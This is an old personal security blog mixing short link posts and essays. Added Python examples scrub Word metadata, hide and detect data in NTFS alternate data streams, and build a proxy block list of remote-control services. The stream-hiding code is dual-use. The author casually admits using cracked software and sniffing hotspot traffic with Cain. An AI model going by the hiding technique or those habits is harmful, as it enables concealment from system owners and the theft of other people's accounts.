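the zipped OOXML container (.docx, Office 2007 and later); the binary .doc
format keeps the same author/company/revision fields in OLE property
streams and needs an OLE parser instead. The sample document below is
constructed for illustration and is not a complete Word package.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

CORE = "docProps/core.xml"
APP = "docProps/app.xml"
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)

# Fields that say who wrote and edited the file, where, and for how long.
CORE_FIELDS = ["dc:title", "dc:subject", "dc:description", "cp:keywords",
               "dc:creator", "cp:lastModifiedBy", "cp:revision",
               "dcterms:created", "dcterms:modified"]
APP_FIELDS = ["ep:Application", "ep:Company", "ep:Manager", "ep:Template",
              "ep:TotalTime"]


def _q(tag):
    """'dc:creator' -> '{uri}creator' for ElementTree lookups."""
    prefix, local = tag.split(":")
    return "{%s}%s" % (NS[prefix], local)


def list_metadata(docx_bytes):
    """Return {field: value} for every metadata field present in the package."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part, fields in ((CORE, CORE_FIELDS), (APP, APP_FIELDS)):
            if part not in zf.namelist():
                continue
            root = ET.fromstring(zf.read(part))
            for tag in fields:
                el = root.find(_q(tag))
                if el is not None and (el.text or "").strip():
                    found[tag] = el.text.strip()
    return found


def scrub_metadata(docx_bytes, keep=("dc:title",)):
    """Return a copy of the package with identifying fields removed.

    Elements are deleted rather than blanked (all are optional in the
    schema); the revision counter is reset to 1 because some readers
    expect it to be present. Every other part is copied byte for byte."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename in (CORE, APP):
                root = ET.fromstring(data)
                fields = CORE_FIELDS if item.filename == CORE else APP_FIELDS
                for tag in fields:
                    el = root.find(_q(tag))
                    if el is None or tag in keep:
                        continue
                    if tag == "cp:revision":
                        el.text = "1"
                    else:
                        root.remove(el)
                data = ET.tostring(root, encoding="UTF-8", xml_declaration=True)
            dst.writestr(item.filename, data)
    return out.getvalue()


def build_sample_docx():
    """Constructed stand-in for a real .docx: only the two property parts
    matter here; a real package also has [Content_Types].xml, rels, etc."""
    core = """<?xml version="1.0" encoding="UTF-8"?>
<cp:coreProperties xmlns:cp="%(cp)s" xmlns:dc="%(dc)s" xmlns:dcterms="%(dcterms)s" xmlns:xsi="%(xsi)s">
  <dc:title>Quarterly report</dc:title>
  <dc:creator>jdoe</dc:creator>
  <cp:lastModifiedBy>Jane Doe</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-01T09:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2006-08-20T17:30:00Z</dcterms:modified>
</cp:coreProperties>""" % NS
    app = """<?xml version="1.0" encoding="UTF-8"?>
<Properties xmlns="%(ep)s">
  <Application>Microsoft Office Word</Application>
  <Company>Acme Corp</Company>
  <TotalTime>95</TotalTime>
</Properties>""" % NS
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(CORE, core)
        zf.writestr(APP, app)
        zf.writestr("word/document.xml", "<document/>")
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_sample_docx()
    print("before:", list_metadata(doc))
    print("after: ", list_metadata(scrub_metadata(doc)))
```

Run it against a real file with `list_metadata(open("report.docx", "rb").read())` before sending the file out; the author, last editor, company, total editing time and revision count are the fields people are usually surprised to see.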
.: ntfs alternate data streams
Quite an ingenious simple little method to hide files on an ntfs disk: alternate data streams. This article on Security Focus makes it look a little more difficult than it is, due to the author going through the effort of describing breaking into a machine to set an ADS on a few hidden files. LNS and LADS are two tools to scan a disk for ADS...although they are certainly not swift in their scans.

Update: An ADS tutorial from STC
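To make the stream trick concrete, here is an added example of mine (not code from the Security Focus article, and not LNS or LADS) that plants data in a stream, reads it back, and enumerates the streams a directory listing hides. It relies on the "file:stream" naming NTFS understands; on a non-NTFS volume, or on Linux/macOS, the colon is just another filename character, so the round trip still works but the data lands in an ordinary visible file. list_streams() uses the Win32 FindFirstStreamW/FindNextStreamW calls, which is my assumption of a Vista-or-later system; XP-era scanners used BackupRead instead.

```python
"""Hide, retrieve and enumerate data in NTFS alternate data streams.

Added example, not from the Security Focus article or the LNS/LADS tools.
Assumes NTFS "file:stream" naming; on other filesystems the colon is an
ordinary filename character and nothing is hidden. list_streams() needs
the Win32 FindFirstStreamW API (Vista and later, an assumption here).
"""
import ctypes
import os
import sys
import tempfile

MAIN_STREAM = "::$DATA"          # the only stream a normal `dir` shows


def write_stream(path, stream, data):
    """Store `data` in the named stream of an existing file."""
    with open("%s:%s" % (path, stream), "wb") as fh:
        fh.write(data)


def read_stream(path, stream):
    """Read the named stream back; the main file's content is untouched."""
    with open("%s:%s" % (path, stream), "rb") as fh:
        return fh.read()


def list_streams(path):
    """Return [(name, size)] for every $DATA stream of `path` (Windows only)."""
    if sys.platform != "win32":
        raise OSError("stream enumeration needs the Win32 API on NTFS")

    class WIN32_FIND_STREAM_DATA(ctypes.Structure):
        _fields_ = [("StreamSize", ctypes.c_longlong),
                    ("cStreamName", ctypes.c_wchar * (260 + 36))]  # MAX_PATH + 36

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.FindFirstStreamW.argtypes = [ctypes.c_wchar_p, ctypes.c_int,
                                     ctypes.c_void_p, ctypes.c_ulong]
    k32.FindFirstStreamW.restype = ctypes.c_void_p
    k32.FindNextStreamW.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
    k32.FindNextStreamW.restype = ctypes.c_int
    k32.FindClose.argtypes = [ctypes.c_void_p]

    info = WIN32_FIND_STREAM_DATA()
    # second argument 0 = FindStreamInfoStandard
    handle = k32.FindFirstStreamW(path, 0, ctypes.byref(info), 0)
    if handle in (None, ctypes.c_void_p(-1).value):      # INVALID_HANDLE_VALUE
        raise ctypes.WinError(ctypes.get_last_error())
    streams = []
    try:
        while True:
            streams.append((info.cStreamName, info.StreamSize))
            if not k32.FindNextStreamW(handle, ctypes.byref(info)):
                break
    finally:
        k32.FindClose(handle)
    return streams


def hidden_streams(path):
    """Names of streams other than the main one, i.e. what `dir` hides."""
    return [name for name, _ in list_streams(path) if name != MAIN_STREAM]


def scan_tree(root):
    """Walk a tree and report every file carrying extra streams: the job
    LNS and LADS do (slowly) for a whole volume."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                extra = hidden_streams(full)
            except OSError:
                continue            # unreadable or not NTFS: skip, don't abort
            if extra:
                hits[full] = extra
    return hits


def demo_roundtrip(workdir=None):
    """Plant a payload behind an innocent file and report what shows."""
    workdir = workdir or tempfile.mkdtemp()
    cover = os.path.join(workdir, "notes.txt")
    with open(cover, "wb") as fh:
        fh.write(b"nothing to see here\n")
    write_stream(cover, "secret.txt", b"hidden payload")
    return {
        "visible_size": os.path.getsize(cover),   # unchanged by the stream
        "payload": read_stream(cover, "secret.txt"),
        "extra_streams": hidden_streams(cover) if sys.platform == "win32" else None,
    }


if __name__ == "__main__":
    print(demo_roundtrip())
```

On NTFS the cover file keeps its original size and `extra_streams` comes back as `[':secret.txt:$DATA']`; copying the file to a FAT volume or a non-Windows host silently drops the stream, which is also why ADS is a poor place to keep anything you actually want to survive.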
.: using alternate non-printing characters in passwords
If one must absolutely use passwords with Windows (not sure why anymore) and not pass phrases, and the password needs to be highly secure, you don't get much better than using non-printable characters. Both of these posts go into detail on using non-printable characters to thwart most password cracking tools, whose default character sets stop at the printable range. The caveat is that the hash itself is no stronger for it; a cracker configured with the full character set is not thwarted, only slowed by the larger keyspace.

Microsoft, of course, even weighs in on their password suggestions.
.: rundown of switch features for security
Every now and then the SANS Handler Diary offers up some nice information. They just threw out this list of switch features that many people never know to use, and I thought it was a nice rundown to use at a later date, especially if my two switches include all of this stuff.
.: more on cracking wep, etc
This link has a number of good pages and pieces of information on cracking WEP and other wireless fun.
.: secure usb drives
Just a quick listing of some secure USB drives that use hardware encryption and are recommended:

mtrust mdrive 500
kingston data traveler elite - privacy edition
verbatim store'n go corporate - secure
.: mocbot analysis
This is an analysis of Mocbot from LURHQ. Especially interesting is the follow-up on the Spammer that this new variant downloads, as well as the graphic showing which antivirus companies properly detected the malware. I wonder if the only ones detecting are the heuristic scanners and not the signature-based scanners...?
.: sandnet for malware
Not sure what to make of this yet, but sounds like an awesome little tool. Lurhq pimps this as a "sandnet" where you can run malware and it will even get its own little "internet" to play with if it chooses to connect out. Sweet action!
.: breaking wep
This paper purports not only to help cracking wep, but to be the final nail in actually outright breaking wep. I've not read this yet, but plan to as this sounds like a very swift, albeit technical, way to break wep.
.: unwanted remote control sites and apps
It really sucks when users think they're being cute by utilizing remote control services to connect from home to work or work to home PCs. These just are not cool, especially when used without permission. I always forget the sites, though, so this will start my list of sites to blacklist on firewalls/web filters whenever I set any up. These are not wanted in the corporate sphere.

GoToMyPC
LogMeIn (and secure.logmein.com)
Hamachi - p2p?

Hamachi is a particularly scary thing, but like Skype, it should require a common mediation server to get the two endpoints together, and therein lies a single point of denial on firewalls. Either way, novel idea, and something I'd like to check out on my own. If even the mediation is peer-to-peer, we should be marking the app as a highly bad app, kinda like an irc client...

Foxy Proxy has some excellent tutorials as well as the proxy stuff.
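Since the list above is meant to end up in a filter, here is an added example of mine (not from the original post) that does the two halves of the job: it flags proxy log entries that reached those services and emits the Squid ACL that would deny them. The domain list is my assumption about where each service is reached (the post only names secure.logmein.com), so verify it against each vendor before deploying; the log lines follow Squid's native access.log layout and are constructed for illustration.

```python
"""Pick remote-control and tunnelling services out of a web-proxy log.

Added example, not from the original post. REMOTE_CONTROL_DOMAINS is an
assumption about where those services are reached (the post only names
secure.logmein.com); verify it before putting it in a filter. SAMPLE_LOG
is constructed in Squid's native access.log layout.
"""
from urllib.parse import urlsplit

# service -> registrable domains; any subdomain of these counts as the service.
REMOTE_CONTROL_DOMAINS = {
    "GoToMyPC": ["gotomypc.com"],
    "LogMeIn": ["logmein.com"],     # covers secure.logmein.com
    "Hamachi": ["hamachi.cc"],      # the mediation server the clients must reach
}

# Constructed sample: time elapsed client code/status bytes method URL ident peer type
SAMPLE_LOG = """\
1155700001.123    812 10.1.2.30 TCP_MISS/200 4120 CONNECT secure.logmein.com:443 - DIRECT/66.0.0.1 -
1155700002.456    233 10.1.2.30 TCP_MISS/200 1983 GET http://www.gotomypc.com/ - DIRECT/66.0.0.2 text/html
1155700003.789     90 10.1.2.77 TCP_MISS/200 512 GET http://notlogmein.com/index.html - DIRECT/66.0.0.3 text/html
1155700004.012    455 10.1.2.77 TCP_MISS/200 2210 GET http://www.hamachi.cc/download - DIRECT/66.0.0.4 text/html
1155700005.345     60 10.1.2.90 TCP_HIT/200 300 GET http://intranet.example/ - NONE/- text/html
"""


def extract_host(url):
    """Hostname from a full URL, or from the bare host:port a CONNECT line carries."""
    if "://" not in url:
        url = "//" + url
    host = urlsplit(url).hostname
    return host.lower() if host else None


def classify_host(host):
    """Service name if `host` is a listed domain or a subdomain of one.

    Matching on '.' + domain keeps look-alikes such as notlogmein.com out."""
    if not host:
        return None
    for service, domains in REMOTE_CONTROL_DOMAINS.items():
        for domain in domains:
            if host == domain or host.endswith("." + domain):
                return service
    return None


def scan_proxy_log(text):
    """Return one record per request that reached a listed service."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue                      # blank or truncated line
        client, method, url = fields[2], fields[5], fields[6]
        host = extract_host(url)
        service = classify_host(host)
        if service:
            hits.append({"client": client, "service": service,
                         "host": host, "method": method})
    return hits


def squid_acl(name="remote_control"):
    """Squid configuration that denies the same set at the proxy.

    A leading dot in dstdomain matches the domain and all its subdomains,
    for CONNECT tunnels as well as plain GETs."""
    domains = sorted(d for ds in REMOTE_CONTROL_DOMAINS.values() for d in ds)
    return ["acl %s dstdomain %s" % (name, " ".join("." + d for d in domains)),
            "http_access deny %s" % name]


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print("%(client)s -> %(host)s (%(service)s, %(method)s)" % hit)
    print("\n".join(squid_acl()))
```

The CONNECT line matters most: these clients tunnel over 443, so a filter that only inspects GET URLs misses them. For Hamachi, denying the mediation server only works as long as the client has to reach it; a client pointed at a different mediation server, or one that could rendezvous peer-to-peer, slips past, which is the worry raised above.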
.: windows countermeasures and threats
This link goes to a Microsoft doc about Windows XP Countermeasures and Threats. Of particular interest, Chapter 7 makes an excellent reference on the services that Windows XP has, and whether they are necessary or not. Disable them if they are not necessary.
.: defcon 14 and black hat 2006 papers
I've already gotten them, but this will just be a placeholder position for links to this years defcon 14 and black hat 2006 papers.
.: guerilla interviewing
This was a nice read about job interviews. I believe Google also did this sort of interview tactic, especially the "impossible question" part. The biggest takeaway from this for me is the Smart and Gets Things Done. I think this is something I, and many people I know in IT, lose sight of sometimes. Get things done.
.: 10 immutable laws of security
Law #1: If a bad guy can persuade you to run his program on your computer, it's not your computer anymore

Law #2: If a bad guy can alter the operating system on your computer, it's not your computer anymore

Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore

Law #4: If you allow a bad guy to upload programs to your website, it's not your website any more

Law #5: Weak passwords trump strong security

Law #6: A computer is only as secure as the administrator is trustworthy

Law #7: Encrypted data is only as secure as the decryption key

Law #8: An out of date virus scanner is only marginally better than no virus scanner at all

Law #9: Absolute anonymity isn't practical, in real life or on the Web

Law #10: Technology is not a panacea
.: security pet peeve #1

May as well get this one off my chest early, and try to keep it short and simple. I really dislike when people spit out that "security through obscurity is worthless." I've read this a lot and heard it in person a lot too, but it is often misused. What is really meant is "security through obscurity alone is worthless." Defense in depth benefits from security through obscurity. In a way, one could argue that passwords and theoretically reversible encryption are just harder-to-guess security through obscurity. The biggest benefits of security through obscurity would be twofold:

1) Eliminate a lot of the casual kiddies and scripted attacks. Running a vulnerable web server on port 1800 does not make the web server less vulnerable, but does limit all the scripts and kiddies who only look for web servers on port 80. You can at least limit your threat exposure.

2) Force determined threats into expending at least a little bit more energy and time to find the obscurities and work through or around them.

Alone, though, security through obscurity is more of a false sense of security than anything; even though the above two benefits are still there, no one should ever sit back and breathe easy with security only through obscurity.

(Points for me to think about: Does this mean brute-forceable passwords and encryption is, in the end, worthless? Where easy passwords and DES were years ago "unbreakable" they are now accepted as flawed...as processors continue to speed up, will today's standards eventually be scoffed at the same way? What can stand the test of time, biometrics? Or are passwords or at least encryption the standards we will always have to live with? As long as we have networks that have to communicate and trust, will there always be hashes or an exchange of keys that at some point is vulnerable?)

.: prove it

I just received email from a vendor I have dealt with in the past, ScriptLogic, whose simple tagline got me thinking: "Can you prove your IT environment is safe?"

I think I need to post that in my workspace at home and use that question as a basis for what I do in security as I move forward.

.: security pet peeve #2

"Well, you know, it's a toolbox, I don't care. You put the tools in and do the job, that's all." - Sam, Ronin, when asked what kind of gun he favors.

This is not so much a security pet peeve as it is a general geek pet peeve. I really do not mind discussions about operating systems and the benefits and drawbacks of each, but the eventual bashing and impassioned arguments that can result from talking about Windows vs Mac vs Linux vs Debian vs OpenBSD are amazingly unnecessary and unwanted.

When it comes down to it, the biggest factor in the security of each OS lies in the operator. I think they each have their own place. And I dislike seeing a Windows user completely refuse to learn Linux just as much as I hate seeing a Unix/Linux user be completely useless in Windows.

And let's face it. All of these are going to be part of a security or IT person's life at some point and we'll have to at least be exposed to Macs, Windows versions, Linux boxes, etc. So basically live with it, and move on. My current job is 99% Windows, but my last job had a couple Macs, many Windows boxes, and some of our critical infrastructure systems were Linux (firewalls, DNS servers, monitoring servers, syslog...).

On a more personal note, I have used Windows versions since 95 (all but ME) and still run Windows XP today for the most part, pretty much just for easy wireless and World of Warcraft. However, I love tinkering and learning Linux versions (especially security live cds) and my next computer purchase will be a Macbook Pro. Someday after I get my Mac, I will convert a third oft-used laptop or desktop to be a permanent and oft-used Linux box so that I can really learn that as I also learn Mac. Eventually, I want to use Linux or Mac full-time, and only move to Windows for my work machine (most likely anyplace I work will provide only Windows XP, I bet), for gaming, and just to keep current on Windows (such as when Vista releases). Of course, my lab will always have a number of Windows boxes performing various roles.

I applaud how far Apple and especially Linux have come over the years to bridge the gap so that the only things I will not be able to carry over to Linux from my Windows world will be games. Even wireless is getting to be easy enough...

.: security catching up to hot technology

DefCon and Black Hat have become the premier security events of the year. Not only are they amazingly fun and informative, but some of the biggest security and insecurity news of the year is now coming out of the minds of those in the culture.

In the last couple years, the dotcom bust gave way to the slow maturation of web-based application delivery, and it is now shooting off quite rapidly. Web-enabled apps have been the buzzword in development for the past two years. In addition, the browser wars with phishers, spammers, and scammers has heightened and browsers are more and more under the guns and fuzzers.

And now, it's happened. JavaScript has been demonstrated to be able to not just screw with a local system, but also penetrate the local network that system is on.

Wow.

Ha.ckers.org made an excellent post that beats anything I could say. But I will add that if someone has presented it to us now, there is little doubt that these techniques have already been in use by the underground.

.: a checklist of windows tools

It is a statement about the security of Windows that I have a series of apps I install on any personal Windows XP build that I perform, just to secure it more. I won't leave home naked, and a Windows box by default being naked exemplifies what is wrong. I was going to post them for my own edification, but have decided to expand this to a listing of some of my favorite tools that I pretty much have on any XP system I build.

First, the initial security, after patches. I use ClamWin Antivirus because it is free. I use a cracked version of Sygate Personal Firewall instead of the XP firewall. I have also recently started trying out an app called WinPooch for digital integrity, ala Tripwire only free (I expect this to be bought up). I also install Mozilla Firefox and Thunderbird (with Enigmail for PGP), not so much for esoteric purposes as for security purposes anymore. While investigating a friend's hijacked AIM account two years ago, I discovered a version of the HTA exploit in IE (still unpatched, I think), and then conversed with the hijacker directly about it before getting my friend's AIM account back. Since then, I've never trusted IE at all. That was the breaking point. The only way to notice or stop that web-based attack against IE was to be running a personal firewall, at the time ZoneAlarm. Otherwise IE was rootable with no user intervention or notification.

In other apps, I have moved from my purchased version of Trillian over to Gaim, due mostly to having used Jabber in my last job and Trillian was slow to adopt. I use a pirated copy of Microsoft Office 2003 (includes everything, Visio, Word, etc). I always move over a bunch of Sysinternals tools as well (pstools, process explorer, tcpview, regmon, and filemon). A cracked version of WinZip 9 gets slapped in pretty quick, as does a free copy of WinAmp (classic mode please). WinDump, WinPcap 3.1, and Wireshark also get installed.

If this is a wireless laptop, I always throw in Netstumbler and Cain. If I am at a wireless hotspot, you can bet I am running Cain in the background (and for this reason, I am very aware of what I myself do at hotspots because I'm not a special hacker or something, I'm a regular guy and if regular guys play with gleaned myspace and email accounts...).

After that, my toolbox gets a bit more murky depending on the uses for the particular box, but pretty much all of the above are part of the 'settling in' process of a new system. Of my few cracked products, someday once I am out of the 'cash-strapped college boy' phase and into a solid, fair-paying job that keeps me happy, all of those may be replaced with legit copies.

.: trying to hold sand

I've been pretty conscious lately of where my personal information goes. I've been interested in staying anonymous for a blog and mailing lists, so my mind is kinda turning that problem over. In addition, with this year's heightened problems with identity theft and disclosure of personal information from places like the VA, every time I fill out a web form, my mind flitters over the thought that here is yet another place my personal information resides, ready to be indexed, stored, stolen, and used.

Just yesterday I submitted a job application to a company in the Seattle area, and at the bottom was a credit report disclosure form complete with social security number field. I immediately glanced up and noticed that the site had no SSL functionality on this particular form. I was a bit annoyed, but at least I was completing this form from my home network. If it had been somewhere else, I would have fully aborted that half hour of effort.

I order books online and provide credit card numbers. I renew my World of Warcraft account online, and there is more information. I submit less information to many sites that require logins, including job sites and corporate sites that want me to log in just to store my resume (so they say). All of this is like trying to hold so much sand in one hand...just think, all it takes is the least secure online store to be broken into and the data siphoned away...such as that site I ordered incense from recently. I wonder if that non-chain, local store has a security guru making sure their site and data are secure?

In the end, I just become more sympathetic to removing the "convenience" of sites "remembering" my account information so I don't have to put it in again for subsequent purchases I may or may not make. I think data retention of that nature should be disallowed, and transaction logs in databases expunged on a regular basis or just stored on offline, secured media. If I only had to worry about the actual transfer of the information from my system over my network, my ISP, the Internet, to the vendor, I would feel a lot better than to have account and login and payment information stored by said vendor... How often do I let a restaurant keep a copy of my credit card and signature so that I can realize the convenience of not having to reach into my pocket to get it out, wait for the return of the waitstaff, and sign the slip?

.: vultures and disclosure

David Maynor and Johnny Cache presented at Black Hat last week about an exploit against wifi drivers in an undisclosed but likely large number of wireless cards and operating systems. This has caused a minor furor amongst, well, pretty much everyone, everywhere.

Some argue that the duo are sellouts because they did not fully disclose who was affected at a "full disclosure" conference. Some argue they were protecting companies. Some take cheap shots at the video-taped demonstration for various reasons (which was done to prevent users from capturing the attack over the air and using it).

Last year Michael Lynn challenged Cisco and even his former employer ISS when he gave his presentation on a big Cisco vulnerability, after Cisco refused to fix it or even acknowledge it for quite some time.

Lynn's example brought up the age-old argument I see far too often in information security: disclosure. What is proper disclosure? Should it be full disclosure? This year it is back. Should Maynor and Cache have revealed the affected chipsets and vendors so that users could stop using them until a fix was in place?

I don't think there are any right answers, but the vultures that love to peck and squabble and argue for no real reason are back at it.

Bottomline, if these two found this problem, there are likely other people who have found out and kept it secret or sold it in private. This exploit was probably found via fuzzing of some type, since that is turning up lots of fun stuff lately. And I can only imagine the fun you could have as a spook or criminal with this sort of exploit in your hands and no one knowing about it...

.: rambling: blogs, news, everywhere

I have a more private site that I keep as my own private little portal to security news, virus information, resources, tools, links, papers, and on and on. Every now and then I add a few sites to my links and remove a few defunct sites.

But every now and then while browsing news, I read on some site that "so and so" has more information, or "from the site of such and such." And I end up following 5 links deep to 5 different sites all reporting on the same news tidbit. Then I realize what has happened and I say to myself, "wow, there's a ton of blogs and news sites for tech news and opinions" (as I type one out here myself!). I wonder how cut-throat some of these link-relationships get? I've seen blog wars where someone feels they didn't get credited or where people of differing views post in their blogs their reactions and then wield their viewers and commentors like some botnet to swoop on the other and comment-spam them, escalating the all-out blogosphere war. Ugh.

It is sobering the effect of the web as a way to express oneself, to self-publish, to create, to share, and share with. Even the most stubborn hermit still has that need to share his or her thoughts with at least one other receptive person, and the web is such an easy outlet to masses. There are times when I feel like heading out to the mountains, just me, nature, spirituality...and an Internet connection. :)

I used to run online gaming league/tournament/community sites, and I know the amount of effort and dedication it takes to keep something popular on the web. It was tough 5 years ago when I finally "retired" from that, and I can't imagine how much tougher it is now, especially when you're not just offering up something unique and fun like digg.com. Then try to find all the digg copiers or slashdot wannabes or every other blog out there that tries to act very self-important and get fans and followers. People like me who add that blog to their short (but growing) list of weekly visits. I can't imagine how tough it might be to always put up meaningful content, opinions, and original substance on a technical blog or tech site...especially for me, someone who does not yet have something unique or original to share (someday, I think so).

But then I look back and see why I post here or even on my personal site. It is much the same way I might keep a journal (girls call it a diary, journal is more manly) next to my nightstand or in my backpack. It is a way to document my thoughts, and also comment on and document news stories. When 9/11 occurred and every blog in existence posted comments, it was not all because they wanted to be part of the news megasphere or get readers or even self-publish. That was an important event in their lives, more than worthy of being in the journal...only today's journals are more able to be public and commented on. I definitely need to lighten up on my lashback of the blog effect on the web.

At any rate, there are blogs and tech news sites all over. There are weekends where I grab something warm to drink, and spend the morning or evening following the blog links. It is much like roaming down an unknown state park path, taking in the sights. Click a link, check that person out, look at his or her link list, pick another that looks interesting, and just roam randomly. Sometimes I pick people from Iowa, sometimes security/hackers (I love wandering into the sites of people whose names I might recognize from the scene, but who have grown up or moved on and their site remains as it was 5 years prior...), sometimes just random people with cool site designs or ways of writing. Sometimes I am looking for new people to add to my bookmarks, sometimes just checking out site designs for inspiration, sometimes just bored.

I wish I could keep up with such a huge community, but there are not many jobs that pay for that kind of a hobby, and in all honesty, I wore out my "online life-living" back in high school and college with IRC, IM, forums, gaming, and other things not worth mentioning, and it really never got me all that far anyway. As it is, I am one of those people who just looks for useful and meaningful blogs and sites to bookmark on my private page, to visit again over the months and perhaps even pipe in and comment to the author, perhaps making a friend or colleague in the process. It is always a sad event when one of my links gets removed, either from lack of updates or lack of updates that are useful to me as either I or they have moved on to other topics or phases of life.

For those that know what it means, I'm feeling just a bit QQ today. :)

.: innocence, playfulness, maliciousness

At first there was innocence, ignorance of the needs of security in networks during the days of the open networks, where network downtime and intrusions were borne more by discovery and accidents. Then there came playfulness, where security was beginning and attackers made more curious, playful attacks, toying with users or just crashing systems to see the effect.

Then came adulthood, maturity. Now, attackers are not necessarily interested in downtime or playing around. They have an agenda and they have profitable goals. Suddenly, we have maliciousness...

.: data, data everywhere...

The old adage can ring true for online habits: "Don't do anything you wouldn't want your grandmother learning about." Long hailed as a place to conduct oneself with a wide measure of anonymity (read how bold kids can be in chat rooms or online games when they don't have to face people in person), we're all starting to feel the creeping implications of data retention policies, particularly illustrated recently by AOL's search data release.

It is a bit sobering. I have been online in some form or other since the early-mid 90's when I was barely into high school. Granted, Google was not around, but AOL sure was. And I used it, and searched using a number of search engines available at the time. How could someone like me know that 10 years later, data retention and search engine query analysis could reveal some dirty little secrets?

Not that I have much to hide, but it is still offending to have that sort of privacy illusion (?) yanked away. Have I searched for porn online? Yeah, I'll admit it. Have I searched for some not-so-legal things such as hacking or bomb-making just to see if I could find it? Probably. Have I done an ego-search looking for my own name? You bet. And have I done all of those, in some combination or other, from the same IP? Considering I've had only a handful of IPs in my online life (not counting AOL dial-up in high school), the chances are really darned good.

Scary. Just think the dirt that may be dug from such databases on politicians 20 years from now. Our president in 40 years may have an old MySpace site still lingering there, waiting to explode with traffic from mudslingers.

Step back and take that one place further. What about spyware/adware apps which remain dormant and diligently reporting user surfing habits to central servers, maybe for years while users just silently huff and deal with their slowly ailing computer speeds. Or ISP traffic records that might be kept some day. Just think of all the places visited from just the one location. This now includes work-related websites, sites for stores in the area (ever look for the most local Mitsubishi dealership or the working hours for the local Papa Murphy's Pizza?), and even the things you'd not want your grandma to know you were viewing online. Even people like me who maintain a more or less anonymous presence in security/hacking venues would be outed.

Then again, some may argue this can be good for the morality of the Internet. I remember a long time ago a study was done where people were put into a room to socialize. Later other people were also put in the same situation, only this time the lights were turned off. You can imagine the remaining senses were used, but they were used to a degree that almost all of the people in the room wouldn't have used them in broad daylight. Use your imagination. :) Maybe with the veil of anonymity removed, people will behave better? Naa...I just think they'll try all the more passionately for anonymous services, onion routing, VPNs, and privacy standards.

.: obvious but new

A career in information technology is a career in lifelong learning.

A career in security is a career in lifelong learning.

Sometimes the obvious things are just not consciously obvious, and once they become obvious, things just "click." That was a click there for me this morning, for some really odd reason. And I'm just glad I love learning both academically and on my own.

.: security pet peeve #3: ethics and the color of your hat

Today I happened to get called a "black hat" on a blog comment simply because of some off-the-cuff comment I made that, admittedly, is not necessarily a straight-laced, stick-in-the-mud, ne'er-do-wrong practice. However, me being called "black hat" is about as laughable, as, well, anything else I've experienced this week so far...

But it illustrates to me one of my other big pet peeves in security: hat color.

Fashionistas aside, some people are pretty obviously Black Hat. The rest of us are pretty much stuck in a quagmire of uncertainty and greyness that really has no definition. What seems like grey hat to some may be very black hat to others; what may be white hat to some may be grey hat to others, and so on.

All of this is just so much drawing lines in the sand, only to have someone else wipe it away and draw their own line in the sand, and another person wiping it away and drawing their own line in the sand. It is all about ethics and morals and how you conduct yourself. And if anyone has taken any academic coursework or even any casual discussion on the subject of ethics, one will quickly realize there are no hard and fast lines. It is all very relative and all very undefined to such a degree that arguing about it is a complete waste of time.

As it is, I have no problem with most "black hats" or "white hats" or anyone in between. Each can live their own life and that is fine with me. But what really incites my pet peeve is when people get so ensconced with rage and prejudice and blind ignorance about the whole issue of ethics that it manifests into nearly fanatical knee-jerk reactions to any hint that there might be an ethics or hat color discussion arising... That is just shallow.

White hats have to live up to a certain level of ethics and morals, right? Well, how do they feel about speeding when driving? If it is a 30mph zone and they drive 32mph, do they feel guilty? Does that guilt adjust their behavior back down to an apologetic 30mph? Do they regularly bump 10mph over the limit, whether in residential or on the freeway in the throes of a 10 hour road trip?

This is the dilemma. This is the grey area.

.: slicing and dicing information loads

There are way too many news sites and blogs out there that I want to read. I'm at a phase in my career where I'm just sponging up everything I can. I have a growing list of sites that I use for resources and news and new stuff.

The problem is trying to manage it all. As I have gotten older, I have realized the grim reality of managing one's time. In my youth and even in college, I had a lot of free time to just while away doing nothing much. Now, I find I have to sacrifice a lot of that "nothing much." Thankfully, I shed the whole "tv watching" thing back in college, and unless it is a movie, my TV gets zero use.

Likewise, unless I'm relaxing for a good many hours on a weekend with my computer, a hot drink, and some calm music, I don't get a chance to check all the blogs I want to check or network with the people I want to network with or try all the new things people have posted about or created. Ugh!

I've tried keeping my own private blog with a list of all the interesting links and then posting about the tidbits I wanted to keep available or braindump about. The posting part has been working amazingly well and I love it. But the links part, which ends up being just a web page of bookmarks, in essence, is something that I have a bit of a problem with.

Reading the news requires clicking on each one. Being that I want this page to remain private, reading at a hotspot or at work can reveal its presence, and I have to take extra coding measures to obfuscate the redirect trackback. This is just a little bit annoying. And if I ever did want to share its existence with someone else, that would mean also sharing my home web site, since they share the same IP (and box). Moving it to hosting is a bit of a chore as well, since I use a smaller, lesser-known perl publishing tool for the site content. Ideally, I would have a second IP just for this site...maybe in the future.

But reading the news there is still less than ideal.

I've tried out standalone RSS readers, and I settled on using RSSReader for a while. Unfortunately, I find that I'm not always on my home laptop in such a fashion as to pull up the app and read the news. Sometimes I'm at work, sometimes I'm in a live cd doing something else, and sometimes I just want one big long page with all the news right there so I can just scroll on down effortlessly. The one good thing I like about RSSReader? If I have populated it beforehand, I don't have to have an Internet connection to read the content later. That's really a big plus, as sometimes I want to go to places that don't have open wireless and sometimes I just don't want to fuss with locking myself down a bit more at a hotspot.

